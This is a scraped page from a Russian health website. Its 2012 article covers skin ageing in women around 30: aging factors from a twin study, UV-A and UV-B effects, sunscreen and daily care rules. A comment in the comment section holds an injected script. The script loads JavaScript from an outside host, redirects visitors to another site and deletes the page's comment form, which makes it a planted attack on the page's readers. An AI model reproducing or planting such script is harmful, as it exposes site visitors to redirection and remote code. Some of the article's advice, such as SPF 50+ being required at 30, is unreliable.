Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Без грима. Женщина 30 лет  >>  Без грима. Женщина 30 лет
 
Обратная связь
 

Без грима. Женщина 30 лет

Размер шрифта
12 февраля 2012 10:01
  • google_analytics: false
  • Нравится

Многие женщины в 30 лет, глядя на себя в зеркало, думают о том, как им не повезло, как их обидела природа. Причем, женщину в таком возрасте особенно заботит преждевременное старение, которое, как ей кажется, убивает красоту.

1 

Внешность женщины напрямую зависит от того, как она относится к себе и как себя ощущает. Этот факт подтвердили и исследования, проведенные учеными Института пластической и реконструктивной хирургии США. Были исследованы состояния внешности женщин-близнецов, у которых не только одинаковый возраст и, как известно, одинаковые ДНК, но и живут они зачастую в одном районе, однако выглядят совершенно по-разному.

Неблагоприятные факторы для внешности женщины

Во время исследования было выявлено несколько моментов, влияющих на внешнюю разницу в возрасте между женщинами-близнецами. Женщины, в жизни которых имели место ниже перечисленные факторы, выглядели старше своих сестер-близнецов на несколько лет:

  • Тяжелое материальное положение.
  • Неудачный брак.
  • Лишний вес.
  • Курение.
  • Употребление алкоголя.
  • Недостаточный и нерегулярный уход за кожей.
  • Длительное пребывание под прямыми лучами солнца.

Наличие хотя бы некоторых из этих факторов неблагоприятно воздействуют на внешность женщины, изначально имеющей отличные шансы надолго сохранить свою молодость и красоту.

Подробнее о воздействии ультрафиолета

Наша кожа загорает благодаря ультрафиолетовым лучам спектра «В». В ответ на их воздействие особые клетки кожи – меланоциты – начинают активно производить пигмент меланин. Именно под действием этого пигмента наша кожа темнеет. Однако с лучами спектра «В» на кожу воздействуют и другие – опасные лучи спектра «А», проникающие в глубокие слои кожи, что приводит к ее обезвоживанию и разрушению коллагена (особого вещества, обеспечивающего эластичность). Так начинается процесс преждевременного старения.

Что дает коже SPF-фильтр

Кремы с SPF-фильтром защищают кожу от неблагоприятного воздействия факторов окружающей среды и образуют невидимую пленку. Она отражает ультрафиолетовые лучи и ослабляет их воздействие, которое способно вызывать рак кожи. Для женщин 30-летнего возраста необходим крем с самой высокой степенью защиты 50+.

Может ли женщина 30 лет выглядеть моложе и как можно дольше сохранить свою красоту? Да, существует несколько правил грамотного ухода за кожей.

Правила ухода

Сократите количество потребляемой на ночь жидкости, чтобы утром на лице не было отеков.

Кожа 30-летней женщины нуждается в профессиональном уходе. Старайтесь регулярно посещать косметолога. Специальные процедуры (массаж, мезотерапия и др.) поддержат тонус кожи на должном уровне и укрепят ее.

Помните, что кожу необходимо очищать не только вечером, но и утром.

Увлажнение – важный момент в уходе за кожей, а вот питательный крем лучше использовать, если кожа сухая или очень сухая.

Также обязателен уход за кожей вокруг глаз при помощи специального крема.

Все кремы и декоративная косметика должны содержать SPF-фильтр, защищающий от ультрафиолетовых лучей. Тщательная защита кожи также важна, если женщина работает за компьютером.

Соблюдая эти правила, женщина в 30 лет сможет подготовить свою кожу к тому, что в 60 лет она будет выглядеть значительно моложе своего возраста.
 



Сюжеты по теме:

Хочу быть красивой. 4 способа не состариться в 30 лет

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:56

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.